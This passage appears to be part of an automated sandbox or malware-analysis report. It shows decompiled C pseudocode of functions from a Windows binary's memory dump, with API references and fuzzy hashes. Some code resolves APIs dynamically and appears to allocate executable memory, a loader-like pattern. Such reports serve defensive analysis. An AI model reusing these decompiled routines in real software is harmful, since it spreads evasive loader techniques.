                                                                                                                                                                        					_t1 =  &_a16; // 0x40306b
                                                                                                                                                                        					_t6 =  *_t5(_a4, _a8, _a12, 0x318,  *_t1);
                                                                                                                                                                        					if(_t6 < 0) {
                                                                                                                                                                        						L4:
                                                                                                                                                                        						SetLastError(RtlNtStatusToDosError(_t6));
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t9 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t9;
                                                                                                                                                                        			}







                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 004012D3
                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004012DA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$LastStatus
                                                                                                                                                                        • String ID: 0Lxt$k0@
                                                                                                                                                                        • API String ID: 4076355890-1244606833
                                                                                                                                                                        • Opcode ID: 5434e82f8a88ea654a0b4898add642c4918f5af8093b46366edd4c3ec384a360
                                                                                                                                                                        • Instruction ID: 7783ffe2bb385284acc0bf7fcf70b02c6e21f51b17b9e70f4ea8840bb5b38d27
                                                                                                                                                                        • Opcode Fuzzy Hash: 5434e82f8a88ea654a0b4898add642c4918f5af8093b46366edd4c3ec384a360
                                                                                                                                                                        • Instruction Fuzzy Hash: E4E08632204312ABC7014FE5AD08F4B7A98BB98780F00083DB741F11B1C674CC529BE9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00401342() {
                                                                                                                                                                        				void* _t1;
                                                                                                                                                                        				long _t3;
                                                                                                                                                                        				void* _t4;
                                                                                                                                                                        				long _t5;
                                                                                                                                                                        				void* _t6;
                                                                                                                                                                        				intOrPtr _t8;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        
                                                                                                                                                                        				_t8 =  *0x40547c; // 0x400000
                                                                                                                                                                        				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                        				 *0x405488 = _t1;
                                                                                                                                                                        				if(_t1 == 0) {
                                                                                                                                                                        					return GetLastError();
                                                                                                                                                                        				}
                                                                                                                                                                        				_t3 = GetVersion();
                                                                                                                                                                        				if(_t3 != 5) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					if(_t12 <= 0) {
                                                                                                                                                                        						_t4 = 0x32;
                                                                                                                                                                        						return _t4;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					if(_t3 > 0) {
                                                                                                                                                                        						L5:
                                                                                                                                                                        						 *0x405474 = _t3;
                                                                                                                                                                        						_t5 = GetCurrentProcessId();
                                                                                                                                                                        						 *0x405470 = _t5;
                                                                                                                                                                        						 *0x40547c = _t8;
                                                                                                                                                                        						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                        						 *0x40546c = _t6;
                                                                                                                                                                        						if(_t6 == 0) {
                                                                                                                                                                        							 *0x40546c =  *0x40546c | 0xffffffff;
                                                                                                                                                                        						}
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t12 = _t3 - _t3;
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401997,?,00000000), ref: 00401351
                                                                                                                                                                        • GetVersion.KERNEL32(?,00000000), ref: 00401360
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401377
                                                                                                                                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401390
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 845504543-0
                                                                                                                                                                        • Opcode ID: 2b31826182439c7bc563c9da98cae4032967feea0fbdca8c799dc7a8ef19b915
                                                                                                                                                                        • Instruction ID: a75a0981205a0aef0128813cf753ba4515b65f77166c3807512c32f65c906ed5
                                                                                                                                                                        • Opcode Fuzzy Hash: 2b31826182439c7bc563c9da98cae4032967feea0fbdca8c799dc7a8ef19b915
                                                                                                                                                                        • Instruction Fuzzy Hash: 00F0AFB1A406008AE7209F38BE09BCA3B64E744722F444136EB84F61F0D37408828F0D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E004018E5(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				intOrPtr* _t12;
                                                                                                                                                                        				long _t14;
                                                                                                                                                                        
                                                                                                                                                                        				_t12 =  *0x405024;
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                                                        					_v8 = _v8 & 0x00000000;
                                                                                                                                                                        					_v12 = 0x318;
                                                                                                                                                                        					_t14 =  *_t12(_a4,  &_v8, 0,  &_v12, 0x3000, 0x40);
                                                                                                                                                                        					if(_t14 < 0) {
                                                                                                                                                                        						SetLastError(RtlNtStatusToDosError(_t14));
                                                                                                                                                                        						_v8 = _v8 & 0x00000000;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _v8;
                                                                                                                                                                        			}








                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040191D
                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00401924
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$LastStatus
                                                                                                                                                                        • String ID: 0Lxt
                                                                                                                                                                        • API String ID: 4076355890-409015746
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040345D(long _a4) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				short* _v32;
                                                                                                                                                                        				void _v36;
                                                                                                                                                                        				void* _t57;
                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                        				void* _t63;
                                                                                                                                                                        				signed int* _t68;
                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                        				intOrPtr* _t71;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				void* _t76;
                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void _t80;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                        				short* _t87;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        				signed int* _t90;
                                                                                                                                                                        				long _t91;
                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                        				void* _t104;
                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                        				long _t108;
                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                        
                                                                                                                                                                        				_t108 = _a4;
                                                                                                                                                                        				_t76 =  *(_t108 + 8);
                                                                                                                                                                        				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                        					L3:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_a4 =  *[fs:0x4];
                                                                                                                                                                        				_v8 =  *[fs:0x8];
                                                                                                                                                                        				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                        					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                        					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                        					if(_t102 != 0xffffffff) {
                                                                                                                                                                        						_t91 = 0;
                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                        						_a4 = 0;
                                                                                                                                                                        						_t57 = _t76;
                                                                                                                                                                        						do {
                                                                                                                                                                        							_t80 =  *_t57;
                                                                                                                                                                        							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                        							if(_t80 == 0xffffffff) {
                                                                                                                                                                        								goto L9;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t80 - _t91;
                                                                                                                                                                        							if(_t80 >= _t91) {
                                                                                                                                                                        								L20:
                                                                                                                                                                        								_t63 = 0;
                                                                                                                                                                        								L61:
                                                                                                                                                                        								return _t63;
                                                                                                                                                                        							}
                                                                                                                                                                        							L9:
                                                                                                                                                                        							__eflags =  *(_t57 + 4);
                                                                                                                                                                        							if( *(_t57 + 4) != 0) {
                                                                                                                                                                        								_t12 =  &_a4;
                                                                                                                                                                        								 *_t12 = _a4 + 1;
                                                                                                                                                                        								__eflags =  *_t12;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                                        							_t57 = _t57 + 0xc;
                                                                                                                                                                        							__eflags = _t91 - _t102;
                                                                                                                                                                        						} while (_t91 <= _t102);
                                                                                                                                                                        						__eflags = _a4;
                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                        							L15:
                                                                                                                                                                        							_t81 =  *0x4054c8; // 0x0
                                                                                                                                                                        							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                        							_t58 = 0;
                                                                                                                                                                        							__eflags = _t81;
                                                                                                                                                                        							if(_t81 <= 0) {
                                                                                                                                                                        								L18:
                                                                                                                                                                        								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                        								__eflags = _t61;
                                                                                                                                                                        								if(_t61 < 0) {
                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t62 = _a4;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t62;
                                                                                                                                                                        								if(_t62 == 0) {
                                                                                                                                                                        									L60:
                                                                                                                                                                        									_t63 = _t104;
                                                                                                                                                                        									goto L61;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									__eflags = _v12 - 0x1000000;
                                                                                                                                                                        									if(_v12 != 0x1000000) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                        									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                        										L46:
                                                                                                                                                                        										_t63 = 1;
                                                                                                                                                                        										 *0x405510 = 1;
                                                                                                                                                                        										__eflags =  *0x405510;
                                                                                                                                                                        										if( *0x405510 != 0) {
                                                                                                                                                                        											goto L61;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t84 =  *0x4054c8; // 0x0
                                                                                                                                                                        										__eflags = _t84;
                                                                                                                                                                        										_t93 = _t84;
                                                                                                                                                                        										if(_t84 <= 0) {
                                                                                                                                                                        											L51:
                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                        											if(_t93 != 0) {
                                                                                                                                                                        												L59:
                                                                                                                                                                        												 *0x405510 = 0;
                                                                                                                                                                        												goto L5;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t77 = 0xf;
                                                                                                                                                                        											__eflags = _t84 - _t77;
                                                                                                                                                                        											if(_t84 <= _t77) {
                                                                                                                                                                        												_t77 = _t84;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t94 = 0;
                                                                                                                                                                        											__eflags = _t77;
                                                                                                                                                                        											if(_t77 < 0) {
                                                                                                                                                                        												L57:
                                                                                                                                                                        												__eflags = _t84 - 0x10;
                                                                                                                                                                        												if(_t84 < 0x10) {
                                                                                                                                                                        													_t86 = _t84 + 1;
                                                                                                                                                                        													__eflags = _t86;
                                                                                                                                                                        													 *0x4054c8 = _t86;
                                                                                                                                                                        												}
                                                                                                                                                                        												goto L59;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												do {
                                                                                                                                                                        													_t68 = 0x4054d0 + _t94 * 4;
                                                                                                                                                                        													_t105 =  *_t68;
                                                                                                                                                                        													_t94 = _t94 + 1;
                                                                                                                                                                        													__eflags = _t94;
                                                                                                                                                                        													__eflags = _t94 - _t77;
                                                                                                                                                                        													 *_t68 = _t110;
                                                                                                                                                                        													_t110 = _t105;
                                                                                                                                                                        												} while (_t94 <= _t77);
                                                                                                                                                                        												goto L57;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										_t69 = 0x4054cc + _t84 * 4;
                                                                                                                                                                        										while(1) {
                                                                                                                                                                        											__eflags =  *_t69 - _t110;
                                                                                                                                                                        											if( *_t69 == _t110) {
                                                                                                                                                                        												goto L51;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t93 = _t93 - 1;
                                                                                                                                                                        											_t69 = _t69 - 4;
                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                        											if(_t93 > 0) {
                                                                                                                                                                        												continue;
                                                                                                                                                                        											}
                                                                                                                                                                        											goto L51;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L51;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t87 = _v32;
                                                                                                                                                                        									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                        									if( *_t87 != 0x5a4d) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                        									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                        									if( *_t71 != 0x4550) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t78 = _t76 - _t87;
                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                        									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                        										goto L60;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                        									__eflags = _t78 - _t72;
                                                                                                                                                                        									if(_t78 < _t72) {
                                                                                                                                                                        										goto L46;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                        										goto L46;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                        										goto L20;
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L46;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								goto L16;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								L16:
                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x4054d0 + _t58 * 4)) - _t110;
                                                                                                                                                                        								if( *((intOrPtr*)(0x4054d0 + _t58 * 4)) == _t110) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t58 = _t58 + 1;
                                                                                                                                                                        								__eflags = _t58 - _t81;
                                                                                                                                                                        								if(_t58 < _t81) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L18;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                        							if(_t58 <= 0) {
                                                                                                                                                                        								goto L5;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *0x405510 = 1;
                                                                                                                                                                        							__eflags =  *0x405510;
                                                                                                                                                                        							if( *0x405510 != 0) {
                                                                                                                                                                        								goto L5;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags =  *((intOrPtr*)(0x4054d0 + _t58 * 4)) - _t110;
                                                                                                                                                                        							if( *((intOrPtr*)(0x4054d0 + _t58 * 4)) == _t110) {
                                                                                                                                                                        								L32:
                                                                                                                                                                        								_t100 = 0;
                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                        								if(_t58 < 0) {
                                                                                                                                                                        									L34:
                                                                                                                                                                        									 *0x405510 = 0;
                                                                                                                                                                        									goto L5;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									goto L33;
                                                                                                                                                                        								}
                                                                                                                                                                        								do {
                                                                                                                                                                        									L33:
                                                                                                                                                                        									_t90 = 0x4054d0 + _t100 * 4;
                                                                                                                                                                        									_t100 = _t100 + 1;
                                                                                                                                                                        									__eflags = _t100 - _t58;
                                                                                                                                                                        									 *_t90 = _t110;
                                                                                                                                                                        									_t110 =  *_t90;
                                                                                                                                                                        								} while (_t100 <= _t58);
                                                                                                                                                                        								goto L34;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t25 = _t81 - 1; // -1
                                                                                                                                                                        							_t58 = _t25;
                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                        							if(_t58 < 0) {
                                                                                                                                                                        								L28:
                                                                                                                                                                        								__eflags = _t81 - 0x10;
                                                                                                                                                                        								if(_t81 < 0x10) {
                                                                                                                                                                        									_t81 = _t81 + 1;
                                                                                                                                                                        									__eflags = _t81;
                                                                                                                                                                        									 *0x4054c8 = _t81;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                        								_t58 = _t28;
                                                                                                                                                                        								goto L32;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								goto L25;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								L25:
                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x4054d0 + _t58 * 4)) - _t110;
                                                                                                                                                                        								if( *((intOrPtr*)(0x4054d0 + _t58 * 4)) == _t110) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t58 = _t58 - 1;
                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                        								if(_t58 >= 0) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                        							if(__eflags >= 0) {
                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                        									goto L34;
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L32;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L28;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                        						__eflags = _t75 - _v8;
                                                                                                                                                                        						if(_t75 < _v8) {
                                                                                                                                                                        							goto L20;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _t75 - _t108;
                                                                                                                                                                        						if(_t75 >= _t108) {
                                                                                                                                                                        							goto L20;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                        					goto L61;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L3;
                                                                                                                                                                        				}
                                                                                                                                                                        			}





































                                                                                                                                                                        0x00403604
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403604
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034ef
                                                                                                                                                                        0x004034ef
                                                                                                                                                                        0x004034ef
                                                                                                                                                                        0x004034f6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034f8
                                                                                                                                                                        0x004034f9
                                                                                                                                                                        0x004034fb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034fb
                                                                                                                                                                        0x00403523
                                                                                                                                                                        0x00403525
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403535
                                                                                                                                                                        0x00403537
                                                                                                                                                                        0x00403539
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040353f
                                                                                                                                                                        0x00403546
                                                                                                                                                                        0x00403572
                                                                                                                                                                        0x00403572
                                                                                                                                                                        0x00403574
                                                                                                                                                                        0x00403576
                                                                                                                                                                        0x0040358a
                                                                                                                                                                        0x0040358c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403578
                                                                                                                                                                        0x00403578
                                                                                                                                                                        0x00403578
                                                                                                                                                                        0x00403581
                                                                                                                                                                        0x00403582
                                                                                                                                                                        0x00403584
                                                                                                                                                                        0x00403586
                                                                                                                                                                        0x00403586
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403578
                                                                                                                                                                        0x00403548
                                                                                                                                                                        0x00403548
                                                                                                                                                                        0x0040354b
                                                                                                                                                                        0x0040354d
                                                                                                                                                                        0x0040355f
                                                                                                                                                                        0x0040355f
                                                                                                                                                                        0x00403562
                                                                                                                                                                        0x00403564
                                                                                                                                                                        0x00403564
                                                                                                                                                                        0x00403565
                                                                                                                                                                        0x00403565
                                                                                                                                                                        0x0040356b
                                                                                                                                                                        0x0040356b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040354f
                                                                                                                                                                        0x0040354f
                                                                                                                                                                        0x0040354f
                                                                                                                                                                        0x00403556
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403558
                                                                                                                                                                        0x00403558
                                                                                                                                                                        0x00403559
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403559
                                                                                                                                                                        0x0040355b
                                                                                                                                                                        0x0040355d
                                                                                                                                                                        0x00403570
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403570
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040355d
                                                                                                                                                                        0x004034cf
                                                                                                                                                                        0x004034d2
                                                                                                                                                                        0x004034d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034d7
                                                                                                                                                                        0x004034d9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004034d9
                                                                                                                                                                        0x0040349e
                                                                                                                                                                        0x004034a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040350E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryQueryVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2850889275-0
                                                                                                                                                                        • Opcode ID: 0571f70d1273587b70a41593df780ae5aff3d20b4e76bd91cba6a8d9c4e06697
                                                                                                                                                                        • Instruction ID: 9b08cf59018af333a9b19941b965ab4b7ecf4ce60a4218e53194480d37047458
                                                                                                                                                                        • Opcode Fuzzy Hash: 0571f70d1273587b70a41593df780ae5aff3d20b4e76bd91cba6a8d9c4e06697
                                                                                                                                                                        • Instruction Fuzzy Hash: FD51CB30610601BBDB25CF19C99476A3FA9EB8535AF24853BD405E73E0E739DE818A5C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040165E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorStatus
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1596131371-0
                                                                                                                                                                        • Opcode ID: 2df2fa3a496b1bf5b10dc844860ef91eec5d12f34f84f5791f6b2514dc0c682b
                                                                                                                                                                        • Instruction ID: c777874dc26cfe07469e196e1318e086f4db5568e11f6b687412d05c914dee13
                                                                                                                                                                        • Opcode Fuzzy Hash: 2df2fa3a496b1bf5b10dc844860ef91eec5d12f34f84f5791f6b2514dc0c682b
                                                                                                                                                                        • Instruction Fuzzy Hash: DFC012716042016BDE189B20DD19E2B7A15EB90340F00482DB249A50B0CA759850DA19
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                        			E0040323C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				signed int* _t43;
                                                                                                                                                                        				char _t44;
                                                                                                                                                                        				void* _t46;
                                                                                                                                                                        				void* _t49;
                                                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                                                        				void* _t54;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				long _t66;
                                                                                                                                                                        				signed int* _t80;
                                                                                                                                                                        				signed int* _t82;
                                                                                                                                                                        				void* _t84;
                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        				void* _t95;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				void* _t106;
                                                                                                                                                                        
                                                                                                                                                                        				_t43 = _t84;
                                                                                                                                                                        				_t65 = __ebx + 2;
                                                                                                                                                                        				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                        				_t89 = _t95;
                                                                                                                                                                        				_t96 = _t95 - 8;
                                                                                                                                                                        				_push(_t65);
                                                                                                                                                                        				_push(_t84);
                                                                                                                                                                        				_push(_t89);
                                                                                                                                                                        				asm("cld");
                                                                                                                                                                        				_t66 = _a8;
                                                                                                                                                                        				_t44 = _a4;
                                                                                                                                                                        				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                        					_push(_t89);
